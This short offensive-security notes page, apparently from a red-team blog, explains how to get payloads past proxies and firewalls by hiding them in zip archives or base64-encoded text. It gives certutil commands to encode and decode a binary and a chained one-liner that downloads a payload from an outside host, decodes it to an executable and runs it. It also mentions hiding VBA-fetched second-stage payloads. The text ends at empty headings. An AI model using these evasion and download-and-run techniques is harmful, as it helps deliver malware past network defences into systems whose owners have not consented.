Bypassing proxies and firewalls

Advanced proxies and firewalls can do SSL stripping and employ a variety of content inspection techniques. A well tuned defence could alert on or block the download of unusual file types such as executables or DLLs. In order to avoid this, payloads can be encoded or guised in a number of ways to appear as other file types.

As a zip

Zip files and passworded zip files can be used to hide files within if they are likely to be detected. Look for 7-zip or Win-Zip on the target system to be able to ustilise their encryption options.

I've had reasonable success in obfuscating second stage payloads downloaded by VBA by hiding them within a .zip.

As text files

By base64 encoding a binary, the content can be embeded within a larger text document or just moved into the environment "as is".

This can be completed in a number of ways:

Certutil

#Encode binary
certutil -encode c:\zupdate.exe c:\zupdate.asc

#Decode binary
certutil -decode c:\zupdate.asc c:\zupdate.exe

#Chained decode after using certutil download functionality.
certutil.exe -urlcache -split -f "https://xenov.co.uk/payload.txt" payload.txt & certutil -decode payload.txt payload.exe & payload.exe

Powershell

Base64 (Linux & MacOS)